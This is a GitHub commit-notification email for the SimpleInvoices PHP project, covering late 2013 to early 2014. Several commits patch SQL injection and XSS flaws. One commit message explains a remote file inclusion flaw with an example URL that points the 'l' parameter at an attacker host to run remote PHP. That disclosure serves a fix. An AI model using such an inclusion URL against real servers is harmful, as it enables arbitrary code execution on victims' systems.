[simpleinvoices/simpleinvoices] 6ad905: VARCHAR => CHAR for table products fields notes_as...

10 views
Skip to first unread message

GitHub

unread,
Jan 6, 2014, 10:06:36 PM1/6/14
to simpleinv...@googlegroups.com
Branch: refs/heads/2013.1.beta.8
Home: https://github.com/simpleinvoices/simpleinvoices
Commit: 6ad9057dcaf04af187c73e5a73bd1a76c6a6ef5f
https://github.com/simpleinvoices/simpleinvoices/commit/6ad9057dcaf04af187c73e5a73bd1a76c6a6ef5f
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-19 (Tue, 19 Nov 2013)

Changed paths:
M databases/mysql/Full_Simple_Invoices.sql
M databases/mysql/structure.sql
M include/sql_patches.php

Log Message:
-----------
VARCHAR => CHAR for table products fields notes_as_description, show_description


Commit: f890574d9890af2d351328df2c3a3dd34ac61515
https://github.com/simpleinvoices/simpleinvoices/commit/f890574d9890af2d351328df2c3a3dd34ac61515
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-19 (Tue, 19 Nov 2013)

Changed paths:
M modules/auth/login.php
M templates/default/invoices/itemised.tpl

Log Message:
-----------
Merge pull request #132 from simpleinvoices/2013.1.beta.8

2013.1.beta.8


Commit: bbd536fea6e439fa41fac9cb2a8a074966e54377
https://github.com/simpleinvoices/simpleinvoices/commit/bbd536fea6e439fa41fac9cb2a8a074966e54377
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-21 (Thu, 21 Nov 2013)

Changed paths:
M modules/product_value/details.php

Log Message:
-----------
Fix SQL Injection Vulnerability

SQL query is not properly escaped, allowing SQL injection attack via malicious request.


Commit: b31a25eac09da130a27306436e608f39c56b9e7e
https://github.com/simpleinvoices/simpleinvoices/commit/b31a25eac09da130a27306436e608f39c56b9e7e
Author: Justin Kelly <jus...@kelly.org.au>
Date: 2013-11-21 (Thu, 21 Nov 2013)

Changed paths:
M modules/product_value/details.php

Log Message:
-----------
Merge pull request #134 from KyraD/patch-1

Fix SQL Injection Vulnerability


Commit: 4793455d6ad06a019d73cf58b791d7e20a5c3806
https://github.com/simpleinvoices/simpleinvoices/commit/4793455d6ad06a019d73cf58b791d7e20a5c3806
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M extensions/eway/library/eway/WebForm.php

Log Message:
-----------
Fix XSS Vulnerability

Not sure if htmlsafe() is declared or not, if it is not then make sure to include 'include/functions.php'


Commit: 95a3082045ca5d43780505e10dccdefa962ee9e1
https://github.com/simpleinvoices/simpleinvoices/commit/95a3082045ca5d43780505e10dccdefa962ee9e1
Author: Sina Mashek <mas...@thescoundrels.net>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M .htaccess

Log Message:
-----------
Update .htaccess

Fixing mod_php5 block to load properly.


Commit: 111215fb301df5b11a0116d4289eead987352191
https://github.com/simpleinvoices/simpleinvoices/commit/111215fb301df5b11a0116d4289eead987352191
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M extensions/eway/library/eway/WebForm.php

Log Message:
-----------
Merge pull request #136 from KyraD/patch-1

Fix XSS Vulnerability


Commit: 03554e87e69f88df19e14603173edda68aa387fe
https://github.com/simpleinvoices/simpleinvoices/commit/03554e87e69f88df19e14603173edda68aa387fe
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M .htaccess

Log Message:
-----------
Merge pull request #138 from tenach/master

Update .htaccess


Commit: 9004b82cf4ebd4bb279199d3a921c11c086d9fb4
https://github.com/simpleinvoices/simpleinvoices/commit/9004b82cf4ebd4bb279199d3a921c11c086d9fb4
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M extensions/text_ui/modules/invoices/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability

POST params are being put into SQL query and not being binded. This patch makes placeholders for them and runs separate query with them if condition met.


Commit: 4bd4e3f44792e31ba2496b875fb4f3d138cc3c34
https://github.com/simpleinvoices/simpleinvoices/commit/4bd4e3f44792e31ba2496b875fb4f3d138cc3c34
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M extensions/expense/modules/expense/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability

same as other PR, but with $_REQUEST vars.


Commit: 77a9fc8c71317b6bf9699baa48f8758d795fcdb4
https://github.com/simpleinvoices/simpleinvoices/commit/77a9fc8c71317b6bf9699baa48f8758d795fcdb4
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-22 (Fri, 22 Nov 2013)

Changed paths:
M include/class/invoice.php

Log Message:
-----------
Fix SQL Injection Vulnerability

Per https://github.com/simpleinvoices/simpleinvoices/blob/master/modules/invoices/xml.php#L15-L16 it does just passes $_REQUEST vars to the class as $this->query and $this->qtype, which is then inserted directly into SQL query as is. This similar code seems to have been copied and pasted to multiple files.


Commit: b363925621fd2aab2bb8470e0754dad073a2d3a9
https://github.com/simpleinvoices/simpleinvoices/commit/b363925621fd2aab2bb8470e0754dad073a2d3a9
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-23 (Sat, 23 Nov 2013)

Changed paths:
M extensions/text_ui/modules/invoices/xml.php

Log Message:
-----------
Merge pull request #139 from KyraD/patch-2

Fix SQL Injection Vulnerability


Commit: 8fa7659a10647b8ae75403c95e2ce14eefc44a93
https://github.com/simpleinvoices/simpleinvoices/commit/8fa7659a10647b8ae75403c95e2ce14eefc44a93
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-23 (Sat, 23 Nov 2013)

Changed paths:
M extensions/expense/modules/expense/xml.php

Log Message:
-----------
Merge pull request #140 from KyraD/patch-3

Fix SQL Injection Vulnerability


Commit: 9678a2708c6f2accde102a4e1d1cf00963d7e87e
https://github.com/simpleinvoices/simpleinvoices/commit/9678a2708c6f2accde102a4e1d1cf00963d7e87e
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-23 (Sat, 23 Nov 2013)

Changed paths:
M include/class/invoice.php

Log Message:
-----------
Merge pull request #141 from KyraD/patch-4

Fix SQL Injection Vulnerability


Commit: 57de0e559d94fae57c4c0d8eaf9e5635e4fa8f80
https://github.com/simpleinvoices/simpleinvoices/commit/57de0e559d94fae57c4c0d8eaf9e5635e4fa8f80
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M extensions/eway/library/eway/EwayPaymentLive.php
M library/ewaylib.php

Log Message:
-----------
eway function getVisitorIP() fix
https://github.com/simpleinvoices/simpleinvoices/issues/137
https://github.com/simpleinvoices/simpleinvoices/pull/142


Commit: b343d53de877d288da718e1b90c2d1fc2f7875a5
https://github.com/simpleinvoices/simpleinvoices/commit/b343d53de877d288da718e1b90c2d1fc2f7875a5
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M extensions/expense/modules/expense/xml.php
M extensions/text_ui/modules/invoices/xml.php
M include/class/invoice.php

Log Message:
-----------
Merge branch 'master' of https://github.com/simpleinvoices/simpleinvoices


Commit: 23fe1e81c7125358171b5cb3d52e3ea7bc2c1a13
https://github.com/simpleinvoices/simpleinvoices/commit/23fe1e81c7125358171b5cb3d52e3ea7bc2c1a13
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/user/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: e900c53efcc726aecf5cc4da976c7721d5fc5c3d
https://github.com/simpleinvoices/simpleinvoices/commit/e900c53efcc726aecf5cc4da976c7721d5fc5c3d
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/preferences/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: b47d32e5fa99e4639ec103c585d1d7187642a0b6
https://github.com/simpleinvoices/simpleinvoices/commit/b47d32e5fa99e4639ec103c585d1d7187642a0b6
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/invoices/product_ajax.php

Log Message:
-----------
Fix XSS Vulnerability

$row_id is being inserted into multiple places in the response HTML without being sanitized.


Commit: 1422c2ed640795e6e56177e0aadfd22d441041e5
https://github.com/simpleinvoices/simpleinvoices/commit/1422c2ed640795e6e56177e0aadfd22d441041e5
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/payments/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: 9dbf662de7b22528fdae4389bff4c4415656bf0e
https://github.com/simpleinvoices/simpleinvoices/commit/9dbf662de7b22528fdae4389bff4c4415656bf0e
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/product_attribute/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: c584b9c22ba88c7de4b831da89403133fe9c4636
https://github.com/simpleinvoices/simpleinvoices/commit/c584b9c22ba88c7de4b831da89403133fe9c4636
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/tax_rates/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: 6e26f0f6db8fcc9d8b343b29d41bcb22b10e07cc
https://github.com/simpleinvoices/simpleinvoices/commit/6e26f0f6db8fcc9d8b343b29d41bcb22b10e07cc
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-24 (Sun, 24 Nov 2013)

Changed paths:
M modules/payment_types/xml.php

Log Message:
-----------
Fix SQL Injection Vulnerability


Commit: bb38e5d6ad5920c14d4469a91051fc32013e3fea
https://github.com/simpleinvoices/simpleinvoices/commit/bb38e5d6ad5920c14d4469a91051fc32013e3fea
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/user/xml.php

Log Message:
-----------
Merge pull request #143 from KyraD/patch-1

Fix SQL Injection Vulnerability


Commit: 41453a387679e6fa18aebf7ee6b2b10a09525c71
https://github.com/simpleinvoices/simpleinvoices/commit/41453a387679e6fa18aebf7ee6b2b10a09525c71
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/preferences/xml.php

Log Message:
-----------
Merge pull request #144 from KyraD/patch-2

Fix SQL Injection Vulnerability


Commit: d1a4099a790b0cb878745118201a6cb06108484b
https://github.com/simpleinvoices/simpleinvoices/commit/d1a4099a790b0cb878745118201a6cb06108484b
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/invoices/product_ajax.php

Log Message:
-----------
Merge pull request #145 from KyraD/patch-3

Fix XSS Vulnerability


Commit: 829c5956683a18b62f677436aec8a00e71a0bbdb
https://github.com/simpleinvoices/simpleinvoices/commit/829c5956683a18b62f677436aec8a00e71a0bbdb
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/payments/xml.php

Log Message:
-----------
Merge pull request #146 from KyraD/patch-4

Fix SQL Injection Vulnerability


Commit: be50367034f0d627a362d1345ec2e384622bd1e0
https://github.com/simpleinvoices/simpleinvoices/commit/be50367034f0d627a362d1345ec2e384622bd1e0
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/product_attribute/xml.php

Log Message:
-----------
Merge pull request #147 from KyraD/patch-5

Fix SQL Injection Vulnerability


Commit: 7bb45fae605bf7f3d0fda9d0c62b9fd7ef337ca3
https://github.com/simpleinvoices/simpleinvoices/commit/7bb45fae605bf7f3d0fda9d0c62b9fd7ef337ca3
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/tax_rates/xml.php

Log Message:
-----------
Merge pull request #148 from KyraD/patch-6

Fix SQL Injection Vulnerability


Commit: f56cb88979864283a7c8e2db0815b78166bdfe1e
https://github.com/simpleinvoices/simpleinvoices/commit/f56cb88979864283a7c8e2db0815b78166bdfe1e
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M modules/payment_types/xml.php

Log Message:
-----------
Merge pull request #149 from KyraD/patch-7

Fix SQL Injection Vulnerability

Further differences in KyraD's merges and apmuthu's commit at https://github.com/apmuthu/simpleinvoices/commit/452890c38dc449c7efc5aae610b29620825ce7ec and https://github.com/apmuthu/simpleinvoices/commit/ae00ec3b16c9ba7cd93072c6b55460dabbdd8e8e will need to be resolved separately.


Commit: 6d439aebb2203719f7434a3033efa70d0929a751
https://github.com/simpleinvoices/simpleinvoices/commit/6d439aebb2203719f7434a3033efa70d0929a751
Author: Kyra ツ <Ky...@users.noreply.github.com>
Date: 2013-11-25 (Mon, 25 Nov 2013)

Changed paths:
M lang/lang_insert.php

Log Message:
-----------
Fix Remote File Inclusion Vulnerability

$_REQUEST['l'] allows any value so a malicious value inserted into 'include "$lang_cmp/lang.php";' will allow an attacker to run arbitrary PHP code on server. For example http://si_domain.com/lang/lang_insert.php?l=http://attacker.com where in their domain root they have a file called lang.php with whatever code they want. I removed trim() as it's not needed due to the strict validation.


Commit: f33a2b828ca87d8cd7588b53b5e9de0635238af8
https://github.com/simpleinvoices/simpleinvoices/commit/f33a2b828ca87d8cd7588b53b5e9de0635238af8
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-26 (Tue, 26 Nov 2013)

Changed paths:
M lang/lang_insert.php

Log Message:
-----------
Merge pull request #150 from KyraD/patch-8

Fix Remote File Inclusion Vulnerability


Commit: a0e8e7ae41017b402bead338072770c25caab7a8
https://github.com/simpleinvoices/simpleinvoices/commit/a0e8e7ae41017b402bead338072770c25caab7a8
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-26 (Tue, 26 Nov 2013)

Changed paths:
M lang/lang_check.php
A lang/lang_functions.php
M lang/lang_insert.php
M modules/payment_types/xml.php
M modules/payments/xml.php
M modules/preferences/xml.php
M modules/product_attribute/xml.php
M modules/tax_rates/xml.php
M modules/user/xml.php

Log Message:
-----------
Abstracted lang functions and code cleanup


Commit: da07583c3c8a2805ac6e2d44d44e3cede0fdd8f3
https://github.com/simpleinvoices/simpleinvoices/commit/da07583c3c8a2805ac6e2d44d44e3cede0fdd8f3
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-26 (Tue, 26 Nov 2013)

Changed paths:
M extensions/default_invoice/modules/customers/xml.php
M extensions/expense/modules/expense/xml.php
M extensions/expense/modules/expense_account/xml.php
M extensions/text_ui/modules/customers/xml.php
M extensions/text_ui/modules/invoices/xml.php
M extensions/text_ui/modules/products/xml.php
M include/class/cron.php
M include/class/inventory.php
M include/class/invoice.php
M include/class/product.php
M include/jquery/jquery.functions.js.tpl
M modules/auth/login.php
M modules/billers/xml.php
M modules/custom_fields/xml.php
M modules/customers/xml.php
M modules/extensions/xml.php
M modules/product_attribute/details.php
M modules/product_value/xml.php

Log Message:
-----------
Merged changes from apmuthu master
https://github.com/apmuthu/simpleinvoices/commit/452890c38dc449c7efc5aae610b29620825ce7ec
https://github.com/apmuthu/simpleinvoices/commit/ae00ec3b16c9ba7cd93072c6b55460dabbdd8e8e
https://github.com/apmuthu/simpleinvoices/commit/122e4f22b157cf7ce92fcb53e29046de14ef79b5
https://github.com/apmuthu/simpleinvoices/commit/6a1f33d31cdd476f3cb184deba00126f2f2c2133


Commit: 67d207b7bd35f2f360a673cfcf8d32e49cced2db
https://github.com/simpleinvoices/simpleinvoices/commit/67d207b7bd35f2f360a673cfcf8d32e49cced2db
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-26 (Tue, 26 Nov 2013)

Changed paths:
M lang/lang_functions.php

Log Message:
-----------
Updated @KyraD lang dir iterator construct


Commit: 8feecf0f3bdd5ce586690b23153c824c9308cd6d
https://github.com/simpleinvoices/simpleinvoices/commit/8feecf0f3bdd5ce586690b23153c824c9308cd6d
Author: Raffael <r.lut...@huanga.com>
Date: 2013-11-27 (Wed, 27 Nov 2013)

Changed paths:
M include/class/domain/id.php

Log Message:
-----------
Update id.php

Related to issue #153


Commit: 4d5a36b257d86636102c0b521b47ed8195f861a4
https://github.com/simpleinvoices/simpleinvoices/commit/4d5a36b257d86636102c0b521b47ed8195f861a4
Author: Justin Kelly <jus...@kelly.org.au>
Date: 2013-11-27 (Wed, 27 Nov 2013)

Changed paths:
M include/class/domain/id.php

Log Message:
-----------
Merge pull request #154 from modir/patch-1

Update id.php by @modir


Commit: df63547ff7dfa013f48687777f4c3cf199f08bbc
https://github.com/simpleinvoices/simpleinvoices/commit/df63547ff7dfa013f48687777f4c3cf199f08bbc
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-30 (Sat, 30 Nov 2013)

Changed paths:
M modules/user/xml.php

Log Message:
-----------
Reverted count of all rows for modules/user/xml.php


Commit: c35fa0fa1931216e76f21a2cb366920b7b242a6b
https://github.com/simpleinvoices/simpleinvoices/commit/c35fa0fa1931216e76f21a2cb366920b7b242a6b
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-11-30 (Sat, 30 Nov 2013)

Changed paths:
M modules/preferences/xml.php

Log Message:
-----------
Reverted and fixed count of rows in modules/preferences/xml.php


Commit: 2c16f8ae0b9a1131a440eca3e846900d4cc3dd5c
https://github.com/simpleinvoices/simpleinvoices/commit/2c16f8ae0b9a1131a440eca3e846900d4cc3dd5c
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-01 (Sun, 01 Dec 2013)

Changed paths:
M lang/ca_ES/lang.php
M lang/cs_CZ/lang.php
M lang/da_DK/lang.php
M lang/de_CH/lang.php
M lang/de_DE/lang.php
M lang/el_GR/lang.php
M lang/en_GB/lang.php
M lang/es_ES/lang.php
M lang/fi_FI/lang.php
M lang/fr_FR/lang.php
M lang/gl_ES/lang.php
M lang/it_IT/lang.php
M lang/lv_LV/lang.php
M lang/mt_MT/lang.php
M lang/nb_NO/lang.php
M lang/nl_NL/lang.php
M lang/pt_PT/lang.php
M lang/ro_RO/lang.php
M lang/sk_SK/lang.php
M lang/sl_SI/lang.php
M lang/sq_AL/lang.php
M lang/sv_SE/lang.php
M lang/tr_TR/lang.php
M lang/vi_VN/lang.php

Log Message:
-----------
invenory => inventory
https://github.com/simpleinvoices/simpleinvoices/issues/156


Commit: 78cd18e881a15ac166295a051333d1bc71f4bd1e
https://github.com/simpleinvoices/simpleinvoices/commit/78cd18e881a15ac166295a051333d1bc71f4bd1e
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-01 (Sun, 01 Dec 2013)

Changed paths:
M lang/ca_ES/lang.php
M lang/cs_CZ/lang.php
M lang/da_DK/lang.php
M lang/de_CH/lang.php
M lang/de_DE/lang.php
M lang/el_GR/lang.php
M lang/en_GB/lang.php
M lang/es_ES/lang.php
M lang/fi_FI/lang.php
M lang/fr_FR/lang.php
M lang/gl_ES/lang.php
M lang/it_IT/lang.php
M lang/lv_LV/lang.php
M lang/mt_MT/lang.php
M lang/nb_NO/lang.php
M lang/nl_NL/lang.php
M lang/pt_PT/lang.php
M lang/ro_RO/lang.php
M lang/sk_SK/lang.php
M lang/sl_SI/lang.php
M lang/sq_AL/lang.php
M lang/sv_SE/lang.php
M lang/tr_TR/lang.php

Log Message:
-----------
successfull => successful
https://github.com/simpleinvoices/simpleinvoices/issues/157


Commit: e890f6fe525037d28535742e46329ef62a502d59
https://github.com/simpleinvoices/simpleinvoices/commit/e890f6fe525037d28535742e46329ef62a502d59
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-01 (Sun, 01 Dec 2013)

Changed paths:
M include/check_permission.php

Log Message:
-----------
@modir / @justinkelly #155 - Undefined index: action in include/check_permission.php on line 7


Commit: f9fcbc03d97f4a16768e9136353dc916ec3324f6
https://github.com/simpleinvoices/simpleinvoices/commit/f9fcbc03d97f4a16768e9136353dc916ec3324f6
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-02 (Mon, 02 Dec 2013)

Changed paths:
M include/check_permission.php

Log Message:
-----------
Fixed variable in previous commit


Commit: c068013fdbb0f6d1a8d88dbe8082f2042b543fda
https://github.com/simpleinvoices/simpleinvoices/commit/c068013fdbb0f6d1a8d88dbe8082f2042b543fda
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-02 (Mon, 02 Dec 2013)

Changed paths:
M include/check_permission.php

Log Message:
-----------
Fixed missing bracket in check_permission.php


Commit: 824b9571694b8bf6fb1256eda214a5c1be46c73a
https://github.com/simpleinvoices/simpleinvoices/commit/824b9571694b8bf6fb1256eda214a5c1be46c73a
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-27 (Fri, 27 Dec 2013)

Changed paths:
M modules/extensions/xml.php

Log Message:
-----------
#164 fix for skipping . and .. dirs in extensions listing


Commit: b46ba9271788bf4ed9f570e367ec6964e7e23b80
https://github.com/simpleinvoices/simpleinvoices/commit/b46ba9271788bf4ed9f570e367ec6964e7e23b80
Author: Raffael <r.lut...@huanga.com>
Date: 2013-12-31 (Tue, 31 Dec 2013)

Changed paths:
M include/class/system/system_default.php

Log Message:
-----------
Update system_default.php

A dollar sign was missing. The file could not run like this.


Commit: fd2385c5b0b9b0eccdcda634d70f164ee9e45284
https://github.com/simpleinvoices/simpleinvoices/commit/fd2385c5b0b9b0eccdcda634d70f164ee9e45284
Author: Ap.Muthu <apm...@usa.net>
Date: 2013-12-31 (Tue, 31 Dec 2013)

Changed paths:
M include/class/system/system_default.php

Log Message:
-----------
Merge pull request #165 from modir/patch-2

Update system_default.php


Commit: 0b0ee8d70414ab0127ba82e4e4c1859758d09bd9
https://github.com/simpleinvoices/simpleinvoices/commit/0b0ee8d70414ab0127ba82e4e4c1859758d09bd9
Author: Ap.Muthu <apm...@usa.net>
Date: 2014-01-03 (Fri, 03 Jan 2014)

Changed paths:
M databases/json/essential_data.json
M databases/mysql/Full_Simple_Invoices.sql
M databases/mysql/structure.sql
M include/acl.php
M include/check_permission.php
M include/class/user.php
M include/include_auth.php
M include/sql_patches.php
M modules/auth/login.php
M modules/user/manage.js.php
M modules/user/save.php
M modules/user/xml.php
M templates/default/user/add.tpl
M templates/default/user/details.tpl

Log Message:
-----------
#166 Patch 292 Customer can view own invoices and details
https://github.com/apmuthu/simpleinvoices/commit/ac01b06d4d2d4236c0903335d0e69ca3b95ca3af
https://github.com/apmuthu/simpleinvoices/commit/ffbcac43dad0f0aa1d87bdd856869defb73ab29e


Commit: 3d32dd8e0520b08318efa6afaea5c885ca760565
https://github.com/simpleinvoices/simpleinvoices/commit/3d32dd8e0520b08318efa6afaea5c885ca760565
Author: Ap.Muthu <apm...@usa.net>
Date: 2014-01-04 (Sat, 04 Jan 2014)

Changed paths:
M modules/invoices/xml.php
M modules/payments/process.php
M templates/default/invoices/quick_view.tpl

Log Message:
-----------
Process Payment for only Real Invoices/Receipts that have Owing > 0
Also Multi Domain Fix for invoice sql


Commit: 30c5250d5d5d82a7d3f750d27637066d0f51ecec
https://github.com/simpleinvoices/simpleinvoices/commit/30c5250d5d5d82a7d3f750d27637066d0f51ecec
Author: Ap.Muthu <apm...@usa.net>
Date: 2014-01-06 (Mon, 06 Jan 2014)

Changed paths:
M include/class/invoice.php
M include/sql_queries.php
M modules/customers/details.php
M modules/customers/xml.php
M modules/invoices/quick_view.php
M modules/invoices/xml.php
M modules/statement/index.php
M templates/default/customers/details.tpl
M templates/default/invoices/quick_view.tpl
M templates/default/statement/index.tpl

Log Message:
-----------
Real invoice compute and display for invoices. customers and statement


Commit: 2d9facca385fd3ac1bff3ae48543c2ecc4ffc3d9
https://github.com/simpleinvoices/simpleinvoices/commit/2d9facca385fd3ac1bff3ae48543c2ecc4ffc3d9
Author: Ap.Muthu <apm...@usa.net>
Date: 2014-01-06 (Mon, 06 Jan 2014)

Changed paths:
M modules/reports/report_biller_by_customer.php
M modules/reports/report_biller_total.php
M modules/reports/report_debtors_aging_total.php
M modules/reports/report_debtors_by_aging.php
M modules/reports/report_debtors_by_amount.php
M modules/reports/report_debtors_owing_by_customer.php
M modules/reports/report_invoice_profit.php
M modules/reports/report_products_sold_by_customer.php
M modules/reports/report_products_sold_total.php
M modules/reports/report_sales_by_periods.php
M modules/reports/report_sales_total.php
M modules/reports/report_tax_total.php
M templates/default/reports/report_debtors_by_aging.tpl
M templates/default/reports/report_debtors_by_amount.tpl

Log Message:
-----------
Fix reports for Total, Paid and Owing to be for real invoices only


Commit: d94f27757dd9ef24300837aa8e56f0881a0689ee
https://github.com/simpleinvoices/simpleinvoices/commit/d94f27757dd9ef24300837aa8e56f0881a0689ee
Author: Ap.Muthu <apm...@usa.net>
Date: 2014-01-06 (Mon, 06 Jan 2014)

Changed paths:
M modules/user/save.php

Log Message:
-----------
User Insert and Update missing comma fix


Commit: 8631709085cb4b50bc7d29ca362ec54c93fbf2a5
https://github.com/simpleinvoices/simpleinvoices/commit/8631709085cb4b50bc7d29ca362ec54c93fbf2a5
Author: justinkelly <jus...@kelly.org.au>
Date: 2014-01-06 (Mon, 06 Jan 2014)

Changed paths:
M templates/default/customers/add.tpl
M templates/default/customers/details.tpl

Log Message:
-----------
remove credit card info


Commit: 7a0b1d2d9a9caf38869f81da139b94950434e3f5
https://github.com/simpleinvoices/simpleinvoices/commit/7a0b1d2d9a9caf38869f81da139b94950434e3f5
Author: justinkelly <jus...@kelly.org.au>
Date: 2014-01-06 (Mon, 06 Jan 2014)

Changed paths:
M databases/json/sample_data.json
M databases/mysql/Full_Simple_Invoices.sql
M databases/mysql/structure.sql
M include/sql_queries.php

Log Message:
-----------
remove credit card fields in PHP and db files - wont be removed from existing databases


Compare: https://github.com/simpleinvoices/simpleinvoices/compare/ac3fb71eb176...7a0b1d2d9a9c
Reply all
Reply to author
Forward
0 new messages